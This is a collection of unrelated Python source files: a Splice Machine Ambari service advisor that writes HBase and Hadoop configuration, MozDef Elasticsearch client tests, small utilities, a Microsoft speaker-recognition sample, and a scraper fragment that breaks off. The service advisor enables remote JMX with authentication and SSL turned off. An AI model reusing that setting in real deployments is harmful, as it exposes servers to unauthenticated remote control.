"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import imp
import math
import os
import re
import socket
import traceback
import glob
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
STACKS_DIR = os.path.join(SCRIPT_DIR, '../../../stacks/')
PARENT_FILE = os.path.join(STACKS_DIR, 'service_advisor.py')
try:
with open(PARENT_FILE, 'rb') as fp:
service_advisor = imp.load_module('service_advisor', fp, PARENT_FILE, ('.py', 'rb', imp.PY_SOURCE))
except Exception as e:
traceback.print_exc()
print "Failed to load parent"
class SPLICEMACHINE251ServiceAdvisor(service_advisor.ServiceAdvisor):
def __init__(self, *args, **kwargs):
self.as_super = super(SPLICEMACHINE251ServiceAdvisor, self)
self.as_super.__init__(*args, **kwargs)
def colocateService(self, hostsComponentsMap, serviceComponents):
pass
def getServiceComponentLayoutValidations(self, services, hosts):
print "getServiceComponentLayoutValidations"
return []
def getServiceConfigurationRecommendations(self, configurations, clusterData, services, hosts):
#Update HBase Classpath
print "getServiceConfigurationRecommendations",services
if "hbase-env" in services["configurations"]:
hbase_env = services["configurations"]["hbase-env"]["properties"]
if "content" in hbase_env:
content = hbase_env["content"]
HBASE_CLASSPATH_PREFIX = "export HBASE_CLASSPATH_PREFIX=/var/lib/splicemachine/*:/usr/hdp/3.1.0.0-78/spark2/jars/*:/usr/hdp/3.1.0.0-78/hadoop/lib/ranger-hdfs-plugin-impl/*:/usr/hdp/3.1.0.0-78/hbase/lib/atlas-hbase-plugin-impl/kafka*"
HBASE_MASTER_OPTS = "export HBASE_MASTER_OPTS=\"${HBASE_MASTER_OPTS} -D"+ " -D".join(self.getMasterDashDProperties()) + "\""
HBASE_REGIONSERVER_OPTS = "export HBASE_REGIONSERVER_OPTS=\"${HBASE_REGIONSERVER_OPTS} -D"+ " -D".join(self.getRegionServerDashDProperties()) + "\""
HBASE_CONF_DIR = "export HBASE_CONF_DIR=${HBASE_CONF_DIR}:/etc/splicemachine/conf/"
if "splicemachine" not in content:
print "Updating Hbase Env Items"
HBASE_CLASSPATH_PREFIX = "#Add Splice Jars to HBASE_PREFIX_CLASSPATH\n" + HBASE_CLASSPATH_PREFIX
HBASE_MASTER_OPTS = "#Add Splice Specific Information to HBase Master\n" + HBASE_MASTER_OPTS
HBASE_REGIONSERVER_OPTS = "#Add Splice Specific Information to Region Server\n" + HBASE_REGIONSERVER_OPTS
HBASE_CONF_DIR = "#Add Splice Specific Information to Region Server\n" + HBASE_CONF_DIR
content = "\n\n".join((content, HBASE_CLASSPATH_PREFIX))
content = "\n\n".join((content, HBASE_MASTER_OPTS))
content = "\n\n".join((content, HBASE_REGIONSERVER_OPTS))
content = "\n\n".join((content, HBASE_CONF_DIR))
print "content: " + content
putHbaseEnvProperty = self.putProperty(configurations, "hbase-env", services)
putHbaseEnvProperty("content", content)
# Update HDFS properties in core-site
if "core-site" in services["configurations"]:
core_site = services["configurations"]["core-site"]["properties"]
putCoreSiteProperty = self.putProperty(configurations, "core-site", services)
for property, desired_value in self.getCoreSiteDesiredValues().iteritems():
if property not in core_site or core_site[property] != desired_value:
putCoreSiteProperty(property, desired_value)
# Update hbase-site properties in hbase-site
if "hbase-site" in services["configurations"]:
hbase_site = services["configurations"]["hbase-site"]["properties"]
putHbaseSitePropertyAttributes = self.putPropertyAttribute(configurations, "hbase-site")
putHBaseSiteProperty = self.putProperty(configurations, "hbase-site", services)
for property, desired_value in self.getHBaseSiteDesiredValues().iteritems():
if property not in hbase_site or hbase_site[property] != desired_value:
putHBaseSiteProperty(property, desired_value)
# Update hbase-site properties in hbase-site
if "yarn-site" in services["configurations"]:
yarn_site = services["configurations"]["yarn-site"]["properties"]
putYarnSitePropertyAttributes = self.putPropertyAttribute(configurations, "yarn-site")
putYarnSiteProperty = self.putProperty(configurations, "yarn-site", services)
for property, desired_value in self.getYarnSiteDesiredValues().iteritems():
if property not in yarn_site or yarn_site[property] != desired_value:
putYarnSiteProperty(property, desired_value)
#update zookeeper configs
if 'zoo.cfg' in services['configurations']:
zoo_cfg = services['configurations']['zoo.cfg']["properties"]
print(zoo_cfg),zoo_cfg
putZooProperty = self.putProperty(configurations, "zoo.cfg", services)
putZooProperty('maxClientCnxns',0)
putZooProperty('maxSessionTimeout',120000)
def getServiceConfigurationsValidationItems(self, configurations, recommendedDefaults, services, hosts):
print "getServiceConfigurationsValidationItems"
return []
# print "getServiceConfigurationsValidationItems"
# validate recommended properties in core-site
# siteName = "core-site"
# method = self.validateCoreSiteConfigurations
# items = self.validateConfigurationsForSite(configurations, recommendedDefaults, services, hosts, siteName, method)
# siteName = "hdfs-site"
# method = self.validateHDFSSiteConfigurations
# resultItems = self.validateConfigurationsForSite(configurations, recommendedDefaults, services, hosts, siteName, method)
# items.extend(resultItems)
# siteName = "hbase-site"
# method = self.validateHBaseSiteConfigurations
# resultItems = self.validateConfigurationsForSite(configurations, recommendedDefaults, services, hosts, siteName, method)
# items.extend(resultItems)
def validateCoreSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):
print "validateCoreSiteConfigurations"
core_site = properties
validationItems = []
for property, desired_value in self.getCoreSiteDesiredValues().iteritems():
if property not in core_site or core_site[property] != desired_value:
message = "Splice Machine requires this property to be set to the recommended value of " + desired_value
validationItems.append({"config-name": property, "item": self.getWarnItem(message)})
return self.toConfigurationValidationProblems(validationItems, "core-site")
def validateHDFSSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):
print "validateHDFSSiteConfigurations"
hdfs_site = properties
validationItems = []
for property, desired_value in self.getHDFSSiteDesiredValues().iteritems():
if property not in hdfs_site or hdfs_site[property] != desired_value:
message = "Splice Machine requires this property to be set to the recommended value of " + desired_value
validationItems.append({"config-name": property, "item": self.getWarnItem(message)})
return self.toConfigurationValidationProblems(validationItems, "hdfs-site")
def validateHBaseSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):
print "validateHBaseSiteConfigurations"
hbase_site = properties
validationItems = []
for property, desired_value in self.getHBaseSiteDesiredValues().iteritems():
print "->" + property + ":" + desired_value + ":" + hbase_site[property]
if property not in hbase_site or hbase_site[property] != desired_value:
message = "Splice Machine requires this property to be set to the recommended value of " + desired_value
validationItems.append({"config-name": property, "item": self.getWarnItem(message)})
return self.toConfigurationValidationProblems(validationItems, "hbase-site")
def getCoreSiteDesiredValues(self):
core_site_desired_values = {
"ipc.server.listen.queue.size" : "3300"
}
return core_site_desired_values
def getHDFSSiteDesiredValues(self):
hdfs_site_desired_values = {
"dfs.datanode.handler.count" : "20",
"dfs.client.read.shortcircuit.buffer.size" : "131072",
}
return hdfs_site_desired_values
def getYarnSiteDesiredValues(self):
yarn_site_desired_values = {
"hdp.version" : "3.1.0.0-78"
}
return yarn_site_desired_values
def getHBaseSiteDesiredValues(self):
hbase_site_desired_values = {
"hbase.coprocessor.master.classes" : "com.splicemachine.hbase.SpliceMasterObserver",
"hbase.regionserver.global.memstore.size" : "0.25",
"hfile.block.cache.size" : "0.25",
"hbase.regionserver.handler.count" : "200",
"hbase.client.scanner.caching" : "1000",
"hbase.hstore.blockingStoreFiles" : "20",
"hbase.hstore.compactionThreshold" : "5",
"hbase.balancer.period" : "60000",
"hbase.client.ipc.pool.size" : "10",
"hbase.client.max.perregion.tasks" : "100",
"hbase.coprocessor.regionserver.classes" : "com.splicemachine.hbase.RegionServerLifecycleObserver,com.splicemachine.hbase.SpliceRSRpcServices",
"hbase.hstore.compaction.min.size" : "136314880",
"hbase.hstore.compaction.min" : "3",
"hbase.hstore.defaultengine.compactionpolicy.class" : "com.splicemachine.compactions.SpliceDefaultCompactionPolicy",
"hbase.hstore.defaultengine.compactor.class" : "com.splicemachine.compactions.SpliceDefaultCompactor",
"hbase.coprocessor.region.classes" : "org.apache.hadoop.hbase.security.access.SecureBulkLoadEndpoint,com.splicemachine.hbase.MemstoreAwareObserver,com.splicemachine.derby.hbase.SpliceIndexObserver,com.splicemachine.derby.hbase.SpliceIndexEndpoint,com.splicemachine.hbase.RegionSizeEndpoint,com.splicemachine.si.data.hbase.coprocessor.TxnLifecycleEndpoint,com.splicemachine.si.data.hbase.coprocessor.SIObserver,com.splicemachine.hbase.BackupEndpointObserver",
"hbase.htable.threads.max" : "96",
"hbase.ipc.warn.response.size" : "-1",
"hbase.ipc.warn.response.time" : "-1",
"hbase.master.loadbalance.bytable" : "true",
"hbase.master.balancer.stochastic.regionCountCost" : "1500",
"hbase.regions.slop" : "0",
"hbase.regionserver.global.memstore.size.lower.limit" : "0.9",
"hbase.client.scanner.timeout.period" : "1200000",
"hbase.regionserver.maxlogs" : "48",
"hbase.regionserver.thread.compaction.large" : "1",
"hbase.regionserver.thread.compaction.small" : "4",
"hbase.regionserver.wal.enablecompression" : "true",
"hbase.rowlock.wait.duration" : "10",
"hbase.splitlog.manager.timeout" : "3000",
"hbase.status.multicast.port" : "16100",
"hbase.wal.disruptor.batch" : "true",
"hbase.wal.provider" : "multiwal",
"hbase.wal.regiongrouping.numgroups" : "16",
"hbase.zookeeper.property.tickTime" : "6000",
"hfile.block.bloom.cacheonwrite" : "TRUE",
"io.storefile.bloom.error.rate" : "0.005",
"splice.authentication.native.algorithm" : "SHA-512",
"splice.authentication" : "NATIVE",
"splice.client.numConnections" : "1",
"splice.client.write.maxDependentWrites" : "60000",
"splice.client.write.maxIndependentWrites" : "60000",
"splice.compression" : "snappy",
"splice.marshal.kryoPoolSize" : "1100",
"splice.olap_server.clientWaitTime" : "900000",
"splice.ring.bufferSize" : "131072",
"splice.splitBlockSize" : "67108864",
"splice.timestamp_server.clientWaitTime" : "120000",
"splice.txn.activeTxns.cacheSize" : "10240",
"splice.txn.completedTxns.concurrency" : "128",
"splice.txn.concurrencyLevel" : "4096",
"splice.olap_server.memory" : "8192",
"splice.olap_server.memoryOverhead" : "2048",
"splice.olap_server.virtualCores" : "2",
"splice.authorization.scheme" : "NATIVE",
"hbase.replication.source.service" : "com.splicemachine.replication.SpliceReplication",
"hbase.replication.sink.service" : "com.splicemachine.replication.SpliceReplication",
"hbase.bucketcache.ioengine" : "",
"hbase.regionserver.replication.handler.count":"40"
}
return hbase_site_desired_values
def getMasterDashDProperties(self):
dashDProperties = [
"splice.spark.enabled=true",
"splice.spark.app.name=SpliceMachine",
"splice.spark.master=yarn",
"splice.spark.submit.deployMode=client",
"splice.spark.logConf=true",
"splice.spark.yarn.maxAppAttempts=1",
"splice.spark.driver.maxResultSize=1g",
"splice.spark.driver.cores=2",
"splice.spark.yarn.am.memory=1g",
"splice.spark.dynamicAllocation.enabled=true",
"splice.spark.dynamicAllocation.executorIdleTimeout=120",
"splice.spark.dynamicAllocation.cachedExecutorIdleTimeout=120",
"splice.spark.dynamicAllocation.minExecutors=0",
"splice.spark.kryo.referenceTracking=false",
"splice.spark.kryo.registrator=com.splicemachine.derby.impl.SpliceSparkKryoRegistrator",
"splice.spark.kryoserializer.buffer.max=512m",
"splice.spark.kryoserializer.buffer=4m",
"splice.spark.locality.wait=100",
"splice.spark.memory.fraction=0.5",
"splice.spark.scheduler.mode=FAIR",
"splice.spark.serializer=org.apache.spark.serializer.KryoSerializer",
"splice.spark.shuffle.compress=false",
"splice.spark.shuffle.file.buffer=128k",
"splice.spark.shuffle.service.enabled=true",
"splice.spark.reducer.maxReqSizeShuffleToMem=134217728",
"splice.spark.yarn.am.extraLibraryPath=/usr/hdp/current/hadoop-client/lib/native",
"splice.spark.yarn.am.waitTime=10s",
"splice.spark.yarn.executor.memoryOverhead=2048",
"splice.spark.yarn.am.extraJavaOptions=-Dhdp.version=3.1.0.0-78",
"splice.spark.driver.extraJavaOptions=-Dhdp.version=3.1.0.0-78",
"splice.spark.driver.extraLibraryPath=/usr/hdp/current/hadoop-client/lib/native",
"splice.spark.driver.extraClassPath=/usr/hdp/current/hbase-regionserver/conf:/usr/hdp/current/hbase-regionserver/lib/htrace-core-3.1.0-incubating.jar",
"splice.spark.ui.retainedJobs=100",
"splice.spark.ui.retainedStages=100",
"splice.spark.worker.ui.retainedExecutors=100",
"splice.spark.worker.ui.retainedDrivers=100",
"splice.spark.streaming.ui.retainedBatches=100",
"splice.spark.executor.cores=4",
"splice.spark.executor.memory=8g",
"spark.compaction.reserved.slots=4",
"splice.spark.eventLog.enabled=true",
"splice.spark.eventLog.dir=hdfs:///user/splice/history",
"splice.spark.local.dir=/tmp",
"splice.spark.executor.userClassPathFirst=true",
"splice.spark.driver.userClassPathFirst=true",
"splice.spark.executor.extraJavaOptions=-Dhdp.version=3.1.0.0-78",
"splice.spark.executor.extraLibraryPath=/usr/hdp/current/hadoop-client/lib/native",
"splice.spark.executor.extraClassPath=/usr/hdp/current/hbase-regionserver/conf:/usr/hdp/current/hbase-regionserver/lib/htrace-core-3.1.0-incubating.jar:/var/lib/splicemachine/*:/usr/hdp/3.1.0.0-78/spark2/jars/*:/usr/hdp/current/hbase-master/lib/*:/usr/hdp/3.1.0.0-78/hbase/lib/atlas-hbase-plugin-impl/kafka*",
"splice.spark.yarn.jars=/usr/hdp/3.1.0.0-78/spark2/jars/*"
]
return dashDProperties
def getRegionServerDashDProperties(self):
dashDProperties = [
"com.sun.management.jmxremote.authenticate=false",
"com.sun.management.jmxremote.ssl=false",
"com.sun.management.jmxremote.port=10102"
]
return dashDProperties
| splicemachine/spliceengine | assembly/hdp3.1.5/src/main/resources/common-services/SPLICEMACHINE/2.5.1/service_advisor.py | Python | agpl-3.0 | 16,650 |
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
# Copyright (c) 2017 Mozilla Corporation
import time
import json
import pytest
import os
import sys
from mozdef_util.query_models import SearchQuery, TermMatch, Aggregation, ExistsMatch
from mozdef_util.elasticsearch_client import ElasticsearchClient, ElasticsearchInvalidIndex
sys.path.append(os.path.join(os.path.dirname(__file__), "../"))
from unit_test_suite import UnitTestSuite
class ElasticsearchClientTest(UnitTestSuite):
def setup(self):
super(ElasticsearchClientTest, self).setup()
self.es_client = ElasticsearchClient(self.options.esservers, bulk_refresh_time=3)
def get_num_events(self):
self.refresh('events')
search_query = SearchQuery()
search_query.add_must(TermMatch('_type', 'event'))
search_query.add_aggregation(Aggregation('_type'))
results = search_query.execute(self.es_client)
if len(results['aggregations']['_type']['terms']) != 0:
return results['aggregations']['_type']['terms'][0]['count']
else:
return 0
class MockTransportClass:
def __init__(self):
self.request_counts = 0
self.original_function = None
def backup_function(self, orig_function):
self.original_function = orig_function
def perform_request(self, method, url, params=None, body=None, timeout=None, ignore=()):
if url == '/_bulk' or url == '/events/event':
self.request_counts += 1
return self.original_function(method, url, params=params, body=body)
class TestWriteWithRead(ElasticsearchClientTest):
def setup(self):
super(TestWriteWithRead, self).setup()
self.alert = {
'category': 'correlatedalerts',
'events': [
{
'documentid': 'l-a3V5mbQl-C91RDzjpNig',
'documentindex': 'events-20160819',
'documentsource': {
'category': 'bronotice',
'details': {
'hostname': 'testhostname',
'note': 'CrowdStrike::Correlated_Alerts example alert',
'sourceipaddress': '1.2.3.4'
},
'eventsource': 'nsm',
'hostname': 'nsm',
'processid': '1337',
'processname': 'syslog',
'receivedtimestamp': '2016-08-19T16:40:55.818595+00:00',
'severity': 'NOTICE',
'source': 'nsm_src',
'summary': 'CrowdStrike::Correlated_Alerts Host 1.2.3.4 caused an alert to throw',
'tags': ['tag1', 'tag2'],
'timestamp': '2016-08-19T16:40:55.818595+00:00',
'utctimestamp': '2016-08-19T16:40:55.818595+00:00'
},
'documenttype': 'bro'
}
],
'severity': 'NOTICE',
'summary': 'nsm CrowdStrike::Correlated_Alerts Host 1.2.3.4 caused an alert to throw',
'tags': [
'nsm',
'bro',
'correlated'
],
'url': 'https://mozilla.org',
'utctimestamp': '2016-08-19T16:40:57.851092+00:00'
}
self.saved_alert = self.es_client.save_alert(body=self.alert)
self.refresh('alerts')
def test_saved_type(self):
assert self.saved_alert['_type'] == 'alert'
def test_saved_index(self):
assert self.saved_alert['_index'] == self.alert_index_name
def test_alert_source(self):
self.fetched_alert = self.es_client.get_alert_by_id(self.saved_alert['_id'])
assert self.fetched_alert['_source'] == self.alert
def test_bad_id(self):
assert self.es_client.get_alert_by_id("123") is None
class TestNoResultsFound(ElasticsearchClientTest):
def test_search_no_results(self):
search_query = SearchQuery()
search_query.add_must(TermMatch('garbagefielddoesntexist', 'testingvalues'))
results = search_query.execute(self.es_client)
assert results['hits'] == []
class TestWithBadIndex(ElasticsearchClientTest):
def test_search_nonexisting_index(self):
search_query = SearchQuery()
search_query.add_must(TermMatch('key', 'value'))
with pytest.raises(ElasticsearchInvalidIndex):
search_query.execute(self.es_client, indices=['doesnotexist'])
class TestSimpleWrites(ElasticsearchClientTest):
def test_simple_writing_event_dict(self):
mock_class = MockTransportClass()
mock_class.backup_function(self.es_client.es_connection.transport.perform_request)
self.es_client.es_connection.transport.perform_request = mock_class.perform_request
event_length = 100
events = []
for num in range(event_length):
events.append({"key": "value" + str(num)})
for event in events:
self.es_client.save_event(body=event)
assert mock_class.request_counts == 100
self.refresh(self.event_index_name)
num_events = self.get_num_events()
assert num_events == 100
def test_simple_writing_event_string(self):
event = json.dumps({"key": "example value for string of json test"})
self.es_client.save_event(body=event)
self.refresh(self.event_index_name)
num_events = self.get_num_events()
assert num_events == 1
query = SearchQuery()
query.add_must(ExistsMatch('key'))
results = query.execute(self.es_client)
assert sorted(results['hits'][0].keys()) == ['_id', '_index', '_score', '_source', '_type']
assert results['hits'][0]['_source']['key'] == 'example value for string of json test'
assert len(results['hits']) == 1
assert results['hits'][0]['_type'] == 'event'
def test_writing_dot_fieldname(self):
event = json.dumps({"key.othername": "example value for string of json test"})
self.es_client.save_event(body=event)
self.refresh(self.event_index_name)
num_events = self.get_num_events()
assert num_events == 1
query = SearchQuery()
query.add_must(ExistsMatch('key.othername'))
results = query.execute(self.es_client)
assert sorted(results['hits'][0].keys()) == ['_id', '_index', '_score', '_source', '_type']
assert results['hits'][0]['_source']['key.othername'] == 'example value for string of json test'
assert len(results['hits']) == 1
assert results['hits'][0]['_type'] == 'event'
def test_writing_event_defaults(self):
query = SearchQuery()
default_event = {}
self.populate_test_event(default_event)
self.refresh(self.event_index_name)
query.add_must(ExistsMatch('summary'))
results = query.execute(self.es_client)
assert len(results['hits']) == 1
assert sorted(results['hits'][0].keys()) == ['_id', '_index', '_score', '_source', '_type']
saved_event = results['hits'][0]['_source']
assert 'category' in saved_event
assert 'details' in saved_event
assert 'hostname' in saved_event
assert 'mozdefhostname' in saved_event
assert 'processid' in saved_event
assert 'processname' in saved_event
assert 'receivedtimestamp' in saved_event
assert 'severity' in saved_event
assert 'source' in saved_event
assert 'summary' in saved_event
assert 'tags' in saved_event
assert 'timestamp' in saved_event
assert 'utctimestamp' in saved_event
assert 'category' in saved_event
def test_writing_with_type(self):
query = SearchQuery()
default_event = {
"_type": "example",
"_source": {
"receivedtimestamp": UnitTestSuite.current_timestamp(),
"summary": "Test summary",
"details": {
"note": "Example note",
}
}
}
self.populate_test_event(default_event)
self.refresh(self.event_index_name)
query.add_must(ExistsMatch('summary'))
results = query.execute(self.es_client)
assert len(results['hits']) == 1
assert sorted(results['hits'][0].keys()) == ['_id', '_index', '_score', '_source', '_type']
assert results['hits'][0]['_type'] == 'example'
assert results['hits'][0]['_source']['summary'] == 'Test summary'
assert results['hits'][0]['_source']['details'] == {"note": "Example note"}
def test_writing_with_source(self):
query = SearchQuery()
default_event = {
"_source": {
"receivedtimestamp": UnitTestSuite.current_timestamp(),
"summary": "Test summary",
"details": {
"note": "Example note",
}
}
}
self.populate_test_event(default_event)
self.refresh(self.event_index_name)
query.add_must(ExistsMatch('summary'))
results = query.execute(self.es_client)
assert len(results['hits']) == 1
assert sorted(results['hits'][0].keys()) == ['_id', '_index', '_score', '_source', '_type']
assert results['hits'][0]['_type'] == 'event'
class BulkTest(ElasticsearchClientTest):
def setup(self):
super(BulkTest, self).setup()
self.mock_class = MockTransportClass()
self.mock_class.backup_function(self.es_client.es_connection.transport.perform_request)
self.es_client.es_connection.transport.perform_request = self.mock_class.perform_request
def teardown(self):
self.es_client.finish_bulk()
super(BulkTest, self).teardown()
class TestBulkWrites(BulkTest):
def test_bulk_writing_simple(self):
event_length = 2000
events = []
for num in range(event_length):
events.append({"key": "value" + str(num)})
assert self.mock_class.request_counts == 0
for event in events:
self.es_client.save_event(body=event, bulk=True)
self.refresh(self.event_index_name)
time.sleep(1)
# We encountered a weird bug in travis
# that would sometimes cause the number
# of requests sent to ES to fluctuate.
# As a result, we're checking within 5 requests
# from 20, to verify we are still using bulk
assert self.mock_class.request_counts <= 25 and self.mock_class.request_counts >= 15
num_events = self.get_num_events()
assert num_events == 2000
class TestBulkWritesWithMoreThanThreshold(BulkTest):
def test_bulk_writing_more_threshold(self):
event_length = 1995
events = []
for num in range(event_length):
events.append({"key": "value" + str(num)})
for event in events:
self.es_client.save_object(index='events', doc_type='event', body=event, bulk=True)
self.refresh(self.event_index_name)
# We encountered a weird bug in travis
# that would sometimes cause the number
# of requests sent to ES to fluctuate.
# As a result, we're checking within 5 requests
# from 20, to verify we are still using bulk
non_refreshed_request_count = self.mock_class.request_counts
assert self.mock_class.request_counts <= 25 and self.mock_class.request_counts >= 15
assert self.get_num_events() == 1900
time.sleep(5)
# All we want to check here is that during the sleep
# we purged the queue and sent the remaining events to ES
assert self.mock_class.request_counts > non_refreshed_request_count
self.refresh(self.event_index_name)
assert self.get_num_events() == 1995
class TestBulkWritesWithLessThanThreshold(BulkTest):
def test_bulk_writing_less_threshold(self):
self.es_client.save_event(body={'key': 'value'}, bulk=True)
assert self.get_num_events() == 0
assert self.mock_class.request_counts == 0
event_length = 5
for num in range(event_length):
self.es_client.save_event(body={"key": "value" + str(num)}, bulk=True)
assert self.get_num_events() == 0
self.refresh(self.event_index_name)
time.sleep(5)
assert self.get_num_events() == 6
class TestWriteWithID(ElasticsearchClientTest):
def test_write_with_id(self):
event = {'key': 'value'}
saved_event = self.es_client.save_event(body=event, doc_id="12345")
assert saved_event['_id'] == '12345'
class TestWriteWithIDExists(ElasticsearchClientTest):
def test_write_with_id(self):
event_id = "12345"
event = {'key': 'value'}
saved_event = self.es_client.save_event(body=event, doc_id=event_id)
assert saved_event['_id'] == event_id
event['new_key'] = 'updated_value'
saved_event = self.es_client.save_event(body=event, doc_id=event_id)
assert saved_event['_id'] == event_id
self.refresh(self.event_index_name)
self.es_client.get_event_by_id(event_id)
class TestGetIndices(ElasticsearchClientTest):
def teardown(self):
super(TestGetIndices, self).teardown()
if pytest.config.option.delete_indexes:
self.es_client.delete_index('test_index')
def test_get_indices(self):
if pytest.config.option.delete_indexes:
self.es_client.create_index('test_index')
time.sleep(1)
indices = self.es_client.get_indices()
indices.sort()
assert indices == [self.alert_index_name, self.previous_event_index_name, self.event_index_name, 'test_index']
class TestIndexExists(ElasticsearchClientTest):
def teardown(self):
super(TestIndexExists, self).teardown()
if pytest.config.option.delete_indexes:
self.es_client.delete_index('test_index')
def test_index_exists(self):
if pytest.config.option.delete_indexes:
self.es_client.create_index('test_index')
time.sleep(1)
indices = self.es_client.index_exists('test_index')
assert indices is True
class TestClusterHealth(ElasticsearchClientTest):
def test_cluster_health_results(self):
health_results = self.es_client.get_cluster_health()
health_keys = health_results.keys()
health_keys.sort()
assert health_keys == ['active_primary_shards', 'active_shards', 'cluster_name', 'initializing_shards', 'number_of_data_nodes', 'number_of_nodes', 'relocating_shards', 'status', 'timed_out', 'unassigned_shards']
assert type(health_results['active_primary_shards']) is int
assert type(health_results['active_shards']) is int
assert type(health_results['cluster_name']) is unicode
assert type(health_results['initializing_shards']) is int
assert type(health_results['number_of_data_nodes']) is int
assert type(health_results['number_of_nodes']) is int
assert type(health_results['relocating_shards']) is int
assert type(health_results['status']) is unicode
assert type(health_results['timed_out']) is bool
assert type(health_results['unassigned_shards']) is int
class TestCreatingAlias(ElasticsearchClientTest):
def setup(self):
super(TestCreatingAlias, self).setup()
if pytest.config.option.delete_indexes:
self.es_client.delete_index('index1', True)
self.es_client.delete_index('index2', True)
self.es_client.delete_index('alias1', True)
def teardown(self):
super(TestCreatingAlias, self).teardown()
if pytest.config.option.delete_indexes:
self.es_client.delete_index('index1', True)
self.es_client.delete_index('index2', True)
self.es_client.delete_index('alias1', True)
def test_simple_create_alias(self):
if pytest.config.option.delete_indexes:
self.es_client.create_index('index1')
self.es_client.create_alias('alias1', 'index1')
alias_indices = self.es_client.get_alias('alias1')
assert alias_indices == ['index1']
indices = self.es_client.get_indices()
assert 'index1' in indices
def test_alias_multiple_indices(self):
if pytest.config.option.delete_indexes:
self.es_client.create_index('index1')
self.es_client.create_index('index2')
self.es_client.create_alias('alias1', 'index1')
self.es_client.create_alias('alias1', 'index2')
alias_indices = self.es_client.get_alias('alias1')
assert alias_indices == ['index2']
indices = self.es_client.get_indices()
assert 'index1' in indices
assert 'index2' in indices
def test_create_alias_multiple_indices(self):
self.es_client.create_index('index1')
self.es_client.create_index('index2')
self.es_client.create_alias_multiple_indices('alias1', ['index1', 'index2'])
alias_indices = self.es_client.get_alias('alias1')
assert len(alias_indices) == 2
assert 'index1' in alias_indices
assert 'index2' in alias_indices
indices = self.es_client.get_indices()
assert 'index1' in indices
assert 'index2' in indices
class TestBulkInvalidFormatProblem(BulkTest):
def setup(self):
super(TestBulkInvalidFormatProblem, self).setup()
mapping = {
"mappings": {
"event": {
"properties": {
"utcstamp": {
"type": "date",
"format": "dateOptionalTime"
}
}
}
}
}
# Recreate the test indexes with a custom mapping to throw
# parsing errors
if pytest.config.option.delete_indexes:
self.es_client.delete_index("events", True)
self.es_client.delete_index(self.event_index_name, True)
self.es_client.create_index(self.event_index_name, index_config=mapping)
self.es_client.create_alias('events', self.event_index_name)
self.es_client.create_alias('events-previous', self.event_index_name)
def test_bulk_problems(self):
event = {
"utcstamp": "2016-11-08T14:13:01.250631+00:00"
}
malformed_event = {
"utcstamp": "abc",
}
self.es_client.save_object(index='events', doc_type='event', body=event, bulk=True)
self.es_client.save_object(index='events', doc_type='event', body=malformed_event, bulk=True)
self.refresh(self.event_index_name)
time.sleep(5)
assert self.get_num_events() == 1
| gdestuynder/MozDef | tests/mozdef_util/test_elasticsearch_client.py | Python | mpl-2.0 | 19,095 |
import codecs
import re
UTF8_BOM_PATTERN = re.compile("\\A(\\xFE\\xFF|\\xFF\\xFE)".encode('utf-8'))
def read_unicode(filename,external_encoding='utf8'):
data = codecs.open(filename,encoding=external_encoding).read()
if UTF8_BOM_PATTERN.match(data):
return unicode(UTF8_BOM_PATTERN.sub('',data)).encode('utf8')
else:
return unicode(data).encode('utf8')
def unique_list(seq):
seen = set()
seen_add = seen.add
return [x for x in seq if x not in seen and not seen_add(x)] | OiNutter/rivets | rivets/utils.py | Python | mit | 481 |
""" Copyright (c) Microsoft. All rights reserved.
Licensed under the MIT license.
Microsoft Cognitive Services (formerly Project Oxford): https://www.microsoft.com/cognitive-services
Microsoft Cognitive Services (formerly Project Oxford) GitHub:
https://github.com/Microsoft/ProjectOxford-ClientSDK
Copyright (c) Microsoft Corporation
All rights reserved.
MIT License:
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import IdentificationServiceHttpClientHelper
import sys
def print_all_profiles(subscription_key):
"""Print all the profiles for the given subscription key.
Arguments:
subscription_key -- the subscription key string
"""
helper = IdentificationServiceHttpClientHelper.IdentificationServiceHttpClientHelper(
subscription_key)
profiles = helper.get_all_profiles()
print('Profile ID, Locale, Enrollment Speech Time, Remaining Enrollment Speech Time,'
' Created Date Time, Last Action Date Time, Enrollment Status')
for profile in profiles:
print('{0}, {1}, {2}, {3}, {4}, {5}, {6}'.format(
profile.get_profile_id(),
profile.get_locale(),
profile.get_enrollment_speech_time(),
profile.get_remaining_enrollment_time(),
profile.get_created_date_time(),
profile.get_last_action_date_time(),
profile.get_enrollment_status()))
if __name__ == "__main__":
if len(sys.argv) < 2:
print('Usage: python PrintAllProfiles.py <subscription_key>')
print('\t<subscription_key> is the subscription key for the service')
sys.exit('Error: Incorrect Usage.')
print_all_profiles(sys.argv[1])
| Microsoft/ProjectOxford-ClientSDK | SpeakerRecognition/Python/Identification/PrintAllProfiles.py | Python | mit | 2,648 |
f = lambda x: x + 1
map(f, [1, 2, 3, 4]) | schmit/intro-python-course | lectures/code/mr_map.py | Python | mit | 41 |
#coding=utf-8
import re
import urllib
import requests
import Queue
import time
from bs4 import BeautifulSoup
class ver9000():
def get_cookie(self,url,headers,count):
ctest=0
while True:
if ctest == count:
return False
else:
if ctest != 0:
